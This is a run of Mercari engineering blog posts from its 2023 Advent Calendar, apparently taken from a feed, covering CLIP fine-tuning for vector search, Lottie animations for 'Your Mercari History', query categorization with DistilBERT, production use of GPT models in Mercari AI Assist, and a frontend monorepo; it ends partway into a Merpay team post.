Vertex AI Vector Search bills us on the number of instances we use – the larger the index, the more expensive it is to serve. An index’s size is determined by the product of the number, dimension, and the bytes required by the datatype of the vectors. By reducing the embedding dimensions to 64, we also scale the index size down to an eighth of the initial 512-dimension, 4-byte float32 setup without having to reduce the number of items in the index. This thereby reduces 80% of the e2-standard-16 instances, and cost, needed to serve the index. To give a sample calculation, scaling 10 e2-standard-16 instances down to 2 alone can save around, monthly, $4,000+ or ¥560,000+ at a rate of $1:¥140.

All things combined, we were convinced that fine-tuning the CLIP model with additional lower-dimension linear layers was the way to go.

Finetuning CLIP on Cloud

We went a magnitude further this time and fine-tuned the base version of CLIP on a curated dataset consisting of over 10 million Mercari item images and text features using the same InfoNCE loss. The fine-tuning process consisted of two rounds.

In the first round, we continued to train the model using our data for around 25 epochs with some standard hyperparameter settings. This is done to adapt the model to our data domain.
The epoch with the best performance on the validation set from the first round was forwarded to the second round of training, where we froze CLIP’s vision model, a zero-shot transfer technique popularized by Zhai et al. (2022), and trained the dimensional reduction layers (512×64) that were added before the final L2-normalization.

Below are some code fragments that illustrate our fine-tuning implementation and architecture.

## Freezing the vision model
def freeze_vision_model(self):
    for param in self.vision_model.parameters():
        param.requires_grad = False

# Custom linear layer for dimensional reduction
# should be added after final projection and before normalization
self.image_embed = nn.Linear(512, embed_size)
self.text_embed = nn.Linear(512, embed_size) # embed_size=64

# image
image_embeds = self.visual_projection(image_embeds)
image_embeds = self.image_embed(
      image_embeds
  )  # custom linear layer for dimension reduction

# text
text_embeds = self.text_projection(text_embeds)
text_embeds = self.text_embed(
    text_embeds
)  # custom linear layer for dimension reduction

The size of the output dimension is determined based on the consideration of cost and performance. We found 64 a great balance and were seeing diminishing returns further down the track. The figure below shows the relative brand accuracy and the relative index size against the dimensions.

Relative Performance and Index Size against Dimensions

For reference only, the entire two-round fine-tuning process would take 5 days with, in total, 50 epochs, a training batch size of 234, and a validation batch size of 1000, on 2 A100s using over 10 million 224×224 images and text pairs. The batch sizes are chosen to best utilize our GPU resources. Do note that the batch size we used was far from the 32K batch size used to train the base CLIP model.

Apart from loss, another metric that we evaluate performance on during training is referred to as the image_to_text_mean_rank. This computes the mean ranking of the cosine similarity for each image embedding against all the text embeddings in the same validation batch. Rank, here, denotes the position of the ground truth, or the corresponding text, of an image in terms of similarity with 1 being the highest.

Image_to_text_mean_rank vs Epoch, Lower is Better

Generating Embeddings, Building Index, and Offline Experiments

After the model was trained, we carried out offline experiments based on the generated embeddings and the index built on top of ScaNN (Scalable Nearest Neighbors), the similarity search algorithm behind Vertex AI Vector Search. 50-100 million images would take 2-3 days to download, and the corresponding embeddings would take another day or two to generate with 10-20+ T4 GPU instances running in parallel. To ensure data consistency in the production environment, we used a dedicated dataflow job for the embedding pipeline.

Below is an example that demonstrates image-to-image search using CLIP and the index built with our inventory. As shown in the example, the majority of the similar listings returned from the search were also Nike sneakers and, in turn, voted “Nike” as the brand and “Shoes” as the category. In our offline experiments, we rinsed and repeated this process for 100K to 1 million items from a distinct test dataset to have a better understanding of how the model will perform online.

Querying on the CLIP Index Using an Image of a Pair of Nike Sneakers

Reflection

Reflecting upon our journey, we realized that there remain too many challenges and stories yet to be shared. Reasons and engineering behind the migration, handling hundreds of millions of image read/write operations, dealing with GPU shortages, conducting countless experiments, the hardship of being an early adopter of a novel GCP service, and all the backend adjustments – any of which can be easily expanded into another blog. Albeit unable to elaborate on them all, we have condensed what we think is the most important.

Mercari’s US@Tokyo ML team has consistently been trying to leverage AI techniques to simplify the selling experience of users. Among those efforts, one is the development and continuous improvement of the models to predict listing fields like category and brand. We genuinely hope that you find this a fruitful reading and that we can continue to be visionary and deliver enriching content.

Acknowledgments

I express my sincere gratitude to Karen Wang and Zainul Din for their invaluable contributions that played a pivotal role in bringing this project to fruition. Special thanks are extended to Rishabh Kumar Shrivastava, Shotaro Kohama, Takuma Yamaguchi, Ajay Daptardar, and Vamshi Teja Racha for their unwavering support and insightful guidance throughout the development process.

Tomorrow’s article will be by @jye. Look forward to it!

Bibliography

Yamaguchi, T. (2017/12/23). 画像での商品検索に向けて. Mercari Engineering Blog. https://engineering.mercari.com/blog/entry/2017-12-23-100000/
Radford, Alec, et al. "Learning transferable visual models from natural language supervision." International conference on machine learning. PMLR, 2021.
Szegedy, Christian, et al. "Rethinking the inception architecture for computer vision." Proceedings of the IEEE conference on computer vision and pattern recognition. 2016.
Google Cloud Platform. (2023). Vertex AI Documentation. Google Cloud. https://cloud.google.com/vertex-ai/pricing#vectorsearch
Wang, Tongzhou, and Phillip Isola. "Understanding contrastive representation learning through alignment and uniformity on the hypersphere." International Conference on Machine Learning. PMLR, 2020.
Parulekar, Advait, et al. "InfoNCE Loss Provably Learns Cluster-Preserving Representations." arXiv preprint arXiv:2302.07920 (2023).
Zhai, Xiaohua, et al. "Lit: Zero-shot transfer with locked-image text tuning." Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition. 2022.

Making of “Your Mercari History”

Fri, 22 Dec 2023 11:00:29 GMT

This post is for Day 22 of Mercari Advent Calendar 2023, brought to you by @manoj from the Mercari India’s LTV Cross Action Team.

Today, I would like to go into the details, especially the challenges faced during the development of “Your Mercari History”, a feature we have worked on and released to the users. As the name implies, it’s for showing the user’s journey from the launch of Mercari to now. We wanted to show the users the first items they had bought, listed and sold out on Mercari and also to give them a glimpse of how they have used Mercari in the past few years.

To give users an engaging experience, we wanted to make use of animations for displaying the content along with background music.

During the implementation of this feature, we faced challenges on all sides including backend, client, and design. I will mostly focus on the client (especially iOS) and design issues faced and how we tackled them.

Before we start, this is the end result we were able to achieve with your mercari history.

https://storage.googleapis.com/prd-engineering-asset/2023/12/ebed696d-06b9-4018-81a2-6cf2af613e4a.mp4

Technologies used

To give users an engaging experience, we wanted to make use of animations for displaying the content along with background music.

However, creating long animations and especially displaying them on the apps can be quite complicated. There were several constraints that guided us on the technologies that we chose.

The animations need to be displayed on both iOS and Android applications, and they need to behave similarly on both platforms.
The elements of the animation, like text, images, and graphs, need to be modifiable based on the user content.
- For example, if we are showing an item, the image of the item and the text also need to be animated along with the other contents in the animation. Otherwise, the content might look completely separate from the animation and might also cause alignment problems depending on the device form factor.
The designers should be able to modify the animations easily and independently from developers to ensure parallel implementation of the feature.

Based on these points, we decided to go with the Lottie framework for our use case.

What is Lottie?

Lottie is a cross-platform library that natively renders vector-based animations exported in the Bodymovin JSON format.

The animation JSON file can be created and exported by making use of the bodymovin After Effects plugin. This allows the designers to create the animations for the apps directly on Adobe After Effects without involving engineers. And since it uses JSON format, the animation file size can be tiny compared to video files.

Other animation solutions considered include

creating animations natively
- Implementing these animations natively will need a lot of work from the app developers and also will be subject to feature availability on each platform.
- There may able be an idea translation discrepancy between what the designers want and what the devs have implemented. Also, the implementation might differ on both platforms and will require in-depth QA on the animations.
Rive
- Rive is a tool that allows developers to create and ship beautiful, interactive animations to any platform.
- But both designers and developers will need to be onboarded with the platform, whereas, for Lottie, designers can use Adobe After Effects directly to generate the animation file.

Regarding the codebase, we were using SwiftUI on iOS and Jetpack Compose on Android.

The Lottie support for SwiftUI was pretty limited. So, we created custom SwiftUI wrappers around the UIKit LottieAnimationView provided by the Lottie framework. This allowed us to customize the view, and also to use the complete feature set of UIKit’s Lottie View.

Challenges

To experiment with Lottie, we got a sample design file from the designers, exported with bodymovin, and we were all excited to start working on it, but things were not straightforward, and we faced several issues, especially since it’s our first time using Lottie with so many customizations.

1. Replacing text in the animation

Lottie framework supports replacing text present in the animation with other text. We wanted to use this feature to replace some of the text in the animation based on user data.

We tried replacing the text in the sample file provided by the designers with a different string by using the TextProvider protocol from the Lottie iOS framework and TextDelegates from the Lottie Android framework. Still, it wasn’t getting replaced at all.

We could swap the text easily with some of the free animation files available on LottieFiles, which allowed us to narrow down the issue to the animation file.

On further investigation, we found that for the dynamic text swapping to work, the text needs to be made configurable on After Effects by using expressions. We eventually solved this concern and supported swapping the texts on the client side.

2. Multiline dynamic text

Some of the texts in the animation, like user reviews and item names are pretty long and can take more lines.

We tried swapping with longer texts, but the text wasn’t wrapping to the next line and was going over the screen’s bounds.

By using escaping characters like \n and \r, the text wrapping worked as expected, but it is difficult to calculate the exact wrapping position based on the screen width, and we can’t introduce line breaks in the middle of the words. Using the CoreText framework in iOS, we can probably calculate the exact line breaks, but the code can become complicated.

We investigated the library and found code that supports displaying paragraph multiline text. On debugging with our animation file, the text config was missing a size sz parameter, which was needed to auto-support text wrapping on the client side.

On further investigation, the designers found that there are two ways of setting text in After Effects.

Point-based text:
It doesn’t have any bounds, and the text is usually one line. It does support line breaks using escaping characters, though.
Paragraph text box:
The text element needs to be created with a box, and the size of the box will be the bounds for the text. By limiting the width of the box, the text wrapping automatically works, even for dynamic text.

By making use of paragraph text, we were able to make multiline text wrapping work.

3. Swapping images

There were several images in the animation like item and user profile thumbnails, which needed to be animated along with other contents. The animation was created using sample images and we wanted to swap them with the actual data.

Lottie framework has AnimationImageProvider protocol on iOS and ImageAssetDelegate for Android to support swapping the images that were part of the animation.

By making use of these, we were able to support swapping the images easily.
We also had to support downloading the images from a URL and providing them to LottieAnimationView on iOS with the image provider. We did it by manually managing the download states of the images on the swiftUI view and then injecting the results into the LottieAnimationView using SwiftUI Bindings.

4. Skipping animation content based on user taps

The animation content is divided into multiple sections. For example, there is a section for showing the first items the user has listed, sold, and purchased, another one that shows the percentage of sales and purchases by the user, and one for showing reviews from other users on the items sold on mercari.

Once the user is done checking the contents of the current section, we want to allow them to jump directly to the next section by tapping on the right side of the screen. To go back to the previous section, they can just tap on the left side of the screen.

To support this, we used the Named Markers of the Lottie animation. A marker is a point in the animation. Each marker has a start time and duration. With the help of the Lottie client libraries, we were able to play a particular marker’s complete duration, allowing us to support the expected user interactions.

5. Showing the animation progress per marker

Since we had multiple sections in the animation, to give the users a sense of progress, we wanted to show the animation progress by using the Instagram story style progress UI.

By using marker duration and tracking the real-time animation progress, we could achieve this behavior.

6. Animating graphs based on user data

To show the percentage of sales vs. item purchases of the user, we wanted to display it as pie charts, which were also part of the animation.

Since the values of these charts are different for different users, we need to animate them according to the user data. We found that there were no direct solutions provided by the Lottie framework to update these values of the animation directly. However, the animation values could be updated by updating the JSON animation file.

Decoding the JSON and updating the values can be done, but doing this on background threads delays the animation display by several seconds due to the size of the JSON file, and doing this on the main thread will block user interactions. Also, we didn’t want to fork the Lottie repository to add this support, as maintaining it would be complicated, and we didn’t want to delay the release.

To avoid affecting user experience, we decided to display the percentage values as text.

7. Huge animation file size

After adding all the details to the animation, the final JSON file size was around ~8MB for an animation duration of 1 minute. The download size was around 2MB after using gzip content encoding on CDN.

We were planning to download the file when the user opened the screen and cache it on the device, but considering the limited bandwidth offered by Japanese mobile networks, we still felt it could be better. We could have also added the file with AppBundle, but this will increase the app size for all the users.

Thanks to help from some good folks from our architect team who had prior experience with Lottie, we found there were many effects that were taking up a lot of space on the animation objects such as the spray effect. By removing these extra effects, we were able to reduce the lottie file size to 1.2MB and the download size of ~800KB.

8. Supporting sharing the screenshots

We wanted to allow users to share the screenshots of the animation on social media to encourage more engagement among mercari users.

For taking the screenshots programmatically, we need an animation view with running animation and move to the position to capture the view. But, creating a copy of the animation view just for screenshots could result in higher memory consumption on the device and also could slow down the app.

To improve this, we took the screenshots just after the animation finished loading and stored them in the view state, which were displayed on the sharing screen at the end of the animation.

Conclusion

After tackling all these problems, we released “Your Mercari History” to the users.
Also, we received very positive reactions from users uploading the posts on X (formerly Twitter) and it was great seeing a lot of members share their history on social media.

I would like to thank all the members who were responsible for developing and releasing this feature, especially:
PM: Furufuru
EM: Prasanna
Designers: Keiko, Gu Megu
iOS: Sachin Nautiyal, Manoj, Samkit, Raj Aryan
Android: Kiran, Prajwal, Vaibhav
Backend: Anand, Sudev, Sidhanth Shubham
QA: Divya Chaudhary

Working on this feature was especially fun for engineers, designers and others involved, as solving challenges gives you enough confidence and motivation to continue improving.
Looking forward to making use of Lottie to release similar exciting features in the future. See you next time.

Tomorrow’s article will be by @mtsuka, the Director of Foundation Engineering at Mercari. Do look forward to it!

LM-based query categorization for query understanding

Fri, 22 Dec 2023 11:00:14 GMT

This post is for Day 22 of Mercari Advent Calendar 2023, brought to you by @pakio from the Mercari US ML/Search team.

Query Understanding is one of the most challenging but rewarding tasks for search engineers and it’s a never-ending challenge for the team. Query Understanding involves various tasks, such as query categorization, query expansion, and query reformulation. Among these tasks, query categorization plays a pivotal role in organizing and classifying queries into target taxonomy, enabling search engines to retrieve results more efficiently.
In this article, we focus on Query Categorization and explore several approaches. We examine both rule-based and ML-based methods, exploring their respective strengths and challenges. Furthermore, we share insights gleaned from our experiments in this task.

Rule-based Method

The Rule-based method is a simple yet powerful approach for query categorization. With this method, search engineers can easily implement logic using a map data structure, ensuring results are highly explainable. The fact that popular search engines like Algolia and Vespa offer this feature by default highlights its importance.
The following diagram illustrates an example process of applying rule-based query categorization in the search system. Here we used a simple category id filter as an example, but you can change this to more complex processes, such as boosting scores or changing the search logic itself, for example.

Rule-Based Query Categorization

At a glance, this method seems very simple and attractive, but we should be aware of the maintenance cost of the rule and it is unfeasible to cover all queries. While some automation is possible through rule generation from master data, human intervention is often necessary to handle synonyms, resolve conflicts between names, and address irregular cases. As query patterns change and new products emerge, there is a need for regular review and updates of the rule-based query categorization. In fact, our team has been operating this method for several years, but it requires periodic review as listing trends change and new products are introduced.

Machine Learning (ML)-based Method

There have been proposals for more automated methods that use query logs, accompanying click logs, and statistics on documents displayed in search results. However, given the extensive data involved, these methods frequently complement machine learning approaches instead of relying solely on rule-based methods.

The paper published in 2018 by Lin et al. introduced a method using click logs for Query Categorization in EC product search. For approximately 40 million queries, the system acquired the categories of items that appeared in the search results and caused an action, i.e. click, add to cart, and purchase. And trained multiple ML models as a text classification task that predicts categories from queries and compares their performance.
The categories used here are hierarchical, and the best model has a micro-F1 score of 0.78 for the 36 level one categories and about 0.58 for the leaf-level categories. This result indicates that ML models can categorize queries with reasonable performance

TABLE I: Best micro-F1 score of multi-class single-label LR (logistic regression), SVMs, XGBoost, fastText and Attentional CNN classifier at different levels. – E-commerce Product Query Classification Using Implicit User’s Feedback from Clicks, Lin et al., Source: https://ieeexplore.ieee.org/document/8622008

Although the conditions and model structure are different, our team also trained a multi-class classification model using query and click logs, to predict the probability of a search query belonging to a certain leaf category. As a result, we confirmed that the micro-F1 score was 0.72 on our test data.

Language Model (LM)-based Method

As you are probably aware, the language model BERT, which was also published at the end of 2018, has been showing excellent performance in various fields. BERT is characterized by its architecture, which makes it more context-sensitive than conventional models such as ACNN, which was compared above, and by the fact that various pre-trained models are available and easy to validate. Another characteristic of publicly available pre-trained BERT is that it uses a general vocabulary, unlike models learned from the company’s query logs. This has some advantages, such as being resistant to unknown queries and being versatile, but it also has disadvantages, such as being vulnerable to domain-specific terms.

Here, we would like to introduce a method implemented by our team using DistilBERT, a derivative model of BERT, for the task of Query Categorization.

LM-Based Query Categorization using DistilBERT

The DistilBERT model is fine-tuned with our data. In this experiment, only the classification layer was trained from query and click logs similar to the machine learning approach described above. The micro-F1 score was 0.80 on our test data.
In an online test comparing this model and the ML model described in the previous section, the coverage of the converted keywords doubled in this model, confirming the merits of using BERT, a highly versatile language model, for further improvements.

Conclusion

In this article, we discussed various approaches to Query Categorization, a crucial task in Query Understanding for search systems. We explored the rule-based method, which is a simple and powerful approach but requires ongoing maintenance costs. Additionally, we delved into the machine learning-based method, which leverages users’ logs to accurately categorize queries with high precision. We also introduced the Language Model-based method, specifically using DistilBERT, which provides reliable results while minimizing training efforts.

While this is an interesting field for me as a search engineer, it will be very interesting to see how the existing Query Understanding technology will be applied and evolve in the future when vector-based search becomes mainstream.

Tomorrow’s article will be by @mtsuka. Look forward to it!

—
Special thanks to @Vamshi for helping me with summarizing the experiment result and reviewing this post.

Leveraging LLMs in Production: Looking Back, Going Forward

Tue, 19 Dec 2023 11:00:23 GMT

This post is for Day 19 of Mercari Advent Calendar 2023, brought to you by @andre from the Mercari Generative AI/LLM team.

Remember when ChatGPT was first released to the public? It reshaped the boundaries of what was possible and elevated the discourse around artificial intelligence. Yet such innovations were not without their enigmas, presenting as much potential as they did new frontiers to explore.

We have come a long way since then. Earlier this month, for example, many researchers and practitioners shone a light on the capabilities and limitations of current Large Language Model (LLM) technologies at the EMNLP 2023 conference, in which Mercari was a sponsor.

In this article, we’re excited to share the strides our team at Mercari has made in utilizing LLMs to enhance our beloved application. We focus primarily on our initial work with Mercari AI Assist (メルカリAIアシスト), a project at the intersection of innovation and practical application.

We hope that this article will serve as a resource that is not only informative but also offers tangible benefits to readers interested in the practical applications of LLMs.

Some key takeaways

Clear and frequent communication across different roles is critical for aligning expectations and making quick progress.
Begin with simple prompt engineering and leverage commercial APIs.
Rigorous pre- and post-processing are required to address LLM output inconsistencies.
Closely following new updates, both from the academic and industrial field, helps us navigate through a rapidly changing field of large language models.

The Team

The Generative AI/LLM team is on a mission to generate impactful business improvements by integrating LLM technologies into our products and enhance productivity. Generally, our efforts are twofold: building and enabling. Speed is a crucial aspect of our work—on one hand, we strive to improve the user experience for our customers by developing high-quality products; on the other, we also aim to quickly acquire knowledge and expertise to empower more teams to understand and implement LLMs in production environments.

We work in a relatively small team, as close and effective communication between PM, designer, and engineers is crucial to be able to work fast and ship our product. As LLM is a relatively new concept for many people, it is important to maintain a constant dialogue about what is achievable and what lies beyond its current scope.

Additionally, the engineers regularly conduct experiments to assess technical feasibility. With the field of LLMs evolving at a breakneck pace, it’s imperative to stay abreast of the latest findings and updates. Social media and news outlets are invaluable for acquiring the most immediate updates, while research papers offer a deeper dive, providing a comprehensive understanding and empirical observations of the latest advancements.

The Product

Mercari AI Assist is envisioned to be an assistant feature that can guide our customers to use our app effectively depending on their preferences.

There is still a lot of work to be done; however, in the initial version, our focus is on the sellers—Mercari customers who use the platform to list and sell items. Through this feature, we utilize LLMs to assist sellers by offering suggestions to enhance their listing information. Below are illustrations that depict what the Title Suggestion feature looks like within the application.

You can read more about Mercari AI Assist in the press release article. Meanwhile, this article will focus more on sharing about the technical side of how we use LLMs to bring the two types of suggestions into production.

Choosing the Right Models and Techniques for Our Case

Firstly, it’s important to emphasize that while this article focuses on the use of LLMs, not everything requires the use of LLMs. Some tasks may be more effectively addressed without them, depending on factors such as cost, objectives, and the development team’s expertise. Knowing when and how to deploy LLMs is crucial.

One of the most challenging tasks in our case is to process and to understand unstructured data from user generated texts. Inside a listing in Mercari, the item’s title and description contain lots of useful information, however, distilling key information and determining how to utilize it has always been difficult. For example, identifying which category had the most listings in the past month might be straightforward, but discerning which factors differentiate listings that sell quickly from those that do not is complex. This is especially true given the varied and unique styles people use to write an item’s title or description. We believed that, given the breadth of data with which a large language model has been pre-trained, it would be adept at meeting such challenges.

Once we identify tasks that LLMs can address, there are several other things we need to decide. Two of the most commonly considered factors are:

Which models to use; e.g. commercially available models or open source models
Fine-tuning or prompt engineering (or training our own LLMs)

In general, fine-tuning often yields better results for specialized tasks within a fixed model size, as it allows the entire network to specialize in solving a specific problem. Conversely, prompting or in-context learning (ICL) can be seen as a method to enable a general LLM to perform specialized downstream tasks.

In the case of Mercari AI Assist, we utilized prompt engineering and simple retrieval-augmented generation to enable the use of commercially available LLMs—specifically, OpenAI’s GPT-4 and GPT-3.5-turbo—for executing a variety of specific tasks. Our objective at the moment is to design an optimal user experience and establish a sustainable and effective workflow for incorporating LLMs into our production environment.

The figure below illustrates the streamlined design of how we implement the Title Suggestion feature within Mercari AI Assist. After experimenting with several methods of leveraging LLMs and taking both cost and performance into account, we determined that this approach best fits our requirements. Generally, the feature is split into two main parts. The first part, highlighted in blue, involves defining “what makes a good title” for a Mercari listing. This is accomplished with assistance from other teams that possess diverse domain expertise. We then collect existing title data aligned with our criteria and utilize GPT-4 to distill the key attributes of an effective title. These key attributes are subsequently stored in a database. The second part of the process, indicated in red, occurs in real-time. We employ GPT-3.5-turbo to identify key attributes (defined by the previous step) from a specific listing as it is created, and then we generate suggestions for refining the listing’s title as necessary.

Through our experiments, we observed that GPT-4 outperforms GPT-3.5-turbo in terms of quality, but it incurs greater costs and latency. Consequently, we found an optimal balance between quality and cost-efficiency by utilizing GPT-4 exclusively for the initial, offline extraction of key attributes, and employing GPT-3.5-turbo for real-time, online operations.

Continuous Evaluation and Mitigating Unexpected Responses

We primarily conduct two types of evaluations to ensure that the quality of outputs returned by the models meets our expectations: offline and online evaluations. Both are carried out before the product’s release and continue thereafter to guarantee that our quality standards are upheld.

Offline evaluation serves several purposes, but it mostly helps us to determine the most effective prompt for the task at hand. We focus on two main aspects: token usage (length) and response quality. Striking the right balance between these two aspects is crucial. Through a combination of manual review and automated evaluation, we ensure that the model’s responses meet our requirements. This step also allows us to estimate the total cost of deploying the feature to all of our users.

Online evaluation, on the other hand, ensures that the feature performs as expected in a live environment—this is particularly significant because we are dealing with user-generated content and substantial traffic in real-time. We conducted a partial release, only implementing a small segment of Mercari AI Assist that calls the LLM API, to assess performance and confirm that the complete feature is ready for our customer base. In this preliminary online test period, we tasked GPT with extracting a single key attribute from an item’s description and to respond simply with “YES” if the attribute is present, or “NO” if it is not.

We found that it is very useful for teams who are not familiar with using LLM in production to perform these kinds of partial preliminary releases, especially when using commercially available APIs provided by third-party services.

During the preliminary online test period, we observed that even though we instructed GPT to provide outputs in a straightforward format (YES or NO), the number of inconsistently formatted responses increased along with the number of requests. The table below presents a sampled result from this experiment.

LLM Output	Count
NO	311,813
No	22,948
Yes	17,236
…	…
Sorry, but I can’t provide the answer you’re looking for.	5
Sorry, but I can’t assist with that request.	4
The provided text does not contain the information.	4
NO NO YES	1
NO YES NO NO YES NO NO NO NO	1

Being aware of such inconsistencies is crucial for production systems. In the above sampled use case, the wrong format might be non-critical and relatively easy to solve (e.g. with regular expressions). However, as we require more complex outputs from LLMs, detecting inconsistencies—as well as hallucinations, a well-known issue with large language models—becomes increasingly challenging.

It’s essential to preprocess prompts that contain user-generated content to minimize the likelihood of GPT generating incorrect responses. Additionally, post-processing logic should be implemented to ensure that only the expected output format is relayed to the client application.

Additional Things to Keep in Mind

Since we’re utilizing an LLM provided by a third-party service, it’s critical to understand how the API functions and what sorts of errors may occur. In addition to common API error types such as authentication and timeout errors, which we might already know how to handle, we need to give special attention to errors more closely related to LLMs. For instance, depending on the API you use, some calls might inadvertently trigger a content violation error. At Mercari, we have our own content moderation system; however, the filtering policy of a third-party API might differ. It is important to be aware of this to accordingly prepare our prompts and to avoid undesired outcomes.

Another consideration is the token count. The number of tokens used can vary depending on the language sent to the model. For instance, an experiment presented at EMNLP 2023 indicated that, using ChatGPT, the average cost of prompt and generated tokens in Japanese can exceed that of English by more than double. This certainly depends on the task at hand and sometimes there’s no alternative, but it is one thing to keep in mind.

Lastly, in this rapidly evolving field, what is considered the best tool can change in just a short span of time. Libraries are updated constantly—with the occasional breaking change—and many of us are constantly looking for ways to optimally integrate LLMs into production systems. This might sound obvious, but we argue that it is important to closely follow new updates regarding LLM research and best practices.

Looking Back, Going Forward

The design and development of Mercari AI Assist has offered us valuable perspectives on working with prompt engineering and integrating commercially available Large Language Models (LLMs) into production. Looking back, I felt that I gained substantial knowledge and experience from the practical aspects of working with LLMs and I am enthusiastic about further advancing my skills alongside the team.

Among the key lessons learned are the significance of cultivating a team equipped with the right mindset and fostering effective communication. I have also experienced and learned about the intricacies of choosing the right model and techniques, finding the right balance between cost and performance, dealing with LLM’s stability when used in a live environment, and addressing unique challenges of LLM, such as hallucination and content moderation. Additionally, I believe it is advisable to have team members with a background in machine learning and natural language processing when working with LLMs. Having the appropriate expertise can speed up various research and experimental processes. For instance, it can enable the team to swiftly determine the suitability of LLMs for a specific task and also decide the most suitable evaluation metrics.

Going forward, we are focusing on improvements such as LLM operations and the development of automated workflows. We are also exploring the use of LLMs for more complex and specialized tasks, which may require the adoption of parameter-efficient fine-tuning techniques. With a rapidly growing field, our team is continuously experimenting and learning, and we understand that our implementation is far from perfect. As with many other practitioners in the field, we are constantly following updates from the field, sharing, listening, and looking for best practices most suitable for our use cases.

I look forward to yet another exciting year filled with obstacles and successes, and to share in these experiences with the incredible members at Mercari.

Tomorrow’s article will be by @ayaneko. Look forward to it!

The Frontend Infrastructure Monorepo

Mon, 18 Dec 2023 11:00:50 GMT

This post is for Day 18 of Mercari Advent Calendar 2023, brought to you by Jon from the Mercari Web Platform team.

Tomorrow’s article will be by Andre and how Mercari uses Language Learning Models to improve Mercari products!

This article is about why the Mercari Web Platform team decided to invest in a frontend monorepo, what we achieved in a year of development, and some of the exciting challenges we’re tackling next.

Repositories in Mercari

Repository management in Mercari varies by team and project. In accordance with our core value “Be a Pro”, developers have autonomy when deciding how and where to write code. Some repositories are segmented by application, and some by team. There are large, single app repositories that have contributions from dozens of developers spanning multiple teams. Other repositories are small, single packages that have one main contributor. Most repository variations have compelling arguments, some of which include non-code related factors. Organizational structure, team size, preferred programming languages, developer bias, project scope, and time constraints can influence a project’s repository design philosophy.

When looking at open source frontend repositories on Github, they are usually scoped to a single package or application. This makes sense when building small to medium sized, isolated components. However, when code bases grow and start to involve multiple teams with dozens of contributors, dependencies, and cross-cutting concerns, it becomes more and more difficult to manage.

One of the inevitable side-effects of Mercari developers moving fast and shipping lots of code, means that code ends up being duplicated and fragmented. It’s awesome to have developers from different teams contribute solutions, and we’ve found that fewer repositories tends to nurture collaboration and discoverability. As Microsoft’s rush team highlights, The emergent principle becomes "one Git repo per team", or even better, "as few Git repos as possible to get the job done".

Web Platform Monorepo

On the Mercari Web Platform Team, we ideally want to share our code with as many frontend teams as possible. The nature of our team’s role implies reusable solutions and the need for discoverability. The latter being a particular pain point for our team. After all, our products are meaningless if there are no consumers! While frontend applications, packages, and Github workflows are only part of our team’s deliverables, we identified some initial code that would benefit from existing within a single repository.

Lighthouse CI Runner

One of our first projects was a tool that runs Google Lighthouse audits in CI/CD against pull-request deployments. This audit allows teams to understand how each code change affects client side metrics, accessibility features, and potential user experience degradations. We wanted to share this across any repository in the organization without requiring consumers to deploy any infrastructure. We were able to modularize a lot of the code required for this tool into individual npm packages that handled small domains such as reading file and directory data, writing to disk, accessing Google Cloud Storage, and posting messages to slack.

Initial Benefits

The upfront cost of creating shared packages, figuring out how to version and publish them, and how to manage local and CI/CD environments in a monorepo was not negligible. While it would have been initially faster to create everything as a single app, we were soon able to reap the benefits of these shared packages when creating our subsequent Code Coverage, package statistics, and analytics tools.

Having our shared libraries inside of a single repository made it easy for new developers to quickly search and find existing code, without having to ask around in Slack if someone had already made something similar.

Using Yarn’s workspace:* syntax, developers could also quickly import libraries into new projects, edit library source code, and have it reflected in their app without having to manage linking and installing across repositories.

For third-party packages, Yarn’s prefer reuse setting and Plug n’ Play module resolution allowed us to reduce version mismatches across libraries, prevent new versions from being added incorrectly, and eliminate accidental phantom dependencies. Before utilizing PnP, we struggled enforcing project encapsulation. It was easy for builds to pass by mistake if a dependency was included in the monorepo and hoisted to the root node_modules, which made it available to all packages in certain contexts.

When combined with Turbo, we found Yarn to be exceptionally good at filtering workspaces (packages or applications) based on commit ranges, workspace name, or folder directory. This allowed us to keep pull-request triggered CI/CD workflow times short while still maintaining decent test and build coverage.

After thousands of commits, a year of development, and constant iteration, we’ve successfully grown our monorepo to include over 30 npm packages, 5 node applications, and 30 Github shareable actions. We’ve landed on a TypeScript tech stack incorporating Yarn’s Plug N’ Play Zero-installs, Turbo repo, Git-LFS, Next.js, and Changesets.

The Future

We’re happy with the progress we’ve made, but there is still a lot of low-hanging fruit for us to reach for! The average time of our pull-request CI/CD workflow is ~6 minutes, while merging to main can take up to ~15 minutes. Refactoring our turbo task definitions and utilizing a turbo cache can significantly improve our build times. Migrating our Docker builds from GCP Cloudbuild to using our in-house ArkCI Github runners will significantly reduce our app build time. In particular, using Yarn’s PnP module resolution strategy has been exciting (and also frustrating). Incredibly, it has already reduced our install times from minutes to seconds in local and CI. Additionally, by ironing-out platform differences and unifying developer git settings, we can remove the need to install completely!

Some of our more challenging tasks have been aligning configurations between build tools for both inside and outside the monorepo. Early on we decided to write and output our code in ESM wherever possible, which has led to many hard to diagnose CJS vs. ESM transpilation issues. Prioritizing simplicity in regards to build tools is a hard task in a frontend ecosystem that relies on shifting standards, complicated tooling, and intricate tooling interactions.

The monorepo architecture has allowed us to make huge, incremental changes to a large codebase within days instead of months. It has also allowed us to have a single entry point for onboarding new contributors, rather than requiring people to learn multiple tech stacks across dozens of repositories. Iterating over our CI/CD pipelines, release strategy, versioning, and documentation has put us in a good position to support larger projects, more teams, and quickly create standardized “Golden Paths” for common developer needs.

If working in a fun, highly autonomous environment while solving modern and impactful frontend platform level challenges sounds interesting, we’re currently hiring and would love to have a chat! Please take a look here, https://apply.workable.com/mercari/j/001A5ADF0F

What the Merpay Enabling Client Team aims for

Mon, 18 Dec 2023 10:00:42 GMT

This post is for Day 18 of Merpay Advent Calendar 2023 , brought to you by @masamichi from the Merpay Enabling Client Team.

This article describes the role of the Merpay Enabling Client Team, of which I am the manager, and what we will be moving forward with.

Merpay Enabling Client Team

The Enabling Program is an organization that supports the entire development process, including solving cross-functional technical issues and improving productivity, with roles such as Architect, SRE, and Data Platform. For more information on the Program-based organization, please refer to @keigow’s article on Day 2.

[JA] メルペイのProgram型組織への移行

The Merpay Enabling Client Team consists of Web/Android/iOS and is responsible for promoting cross-functional projects in the Client area.
Until October 2023, the Client team was divided by platform (Web/Android/iOS), and I was the manager of the Merpay iOS team, but after the transition to the Program-based organization structure, I am now the manager of the Enabling Client Team.

The team’s vision is:

“Enable continuous product improvement through client engineering excellence”

We intend to contribute to the growth of the product as a team. The word "excellence" is a reference to a statement made by current Apple CEO Tim Cook in 2009 while former Apple CEO, the late Steve Jobs, was recuperating.

"We don’t settle for anything less than excellence in every group in the company — and we have the self honesty to admit when we’re wrong and the courage to change."

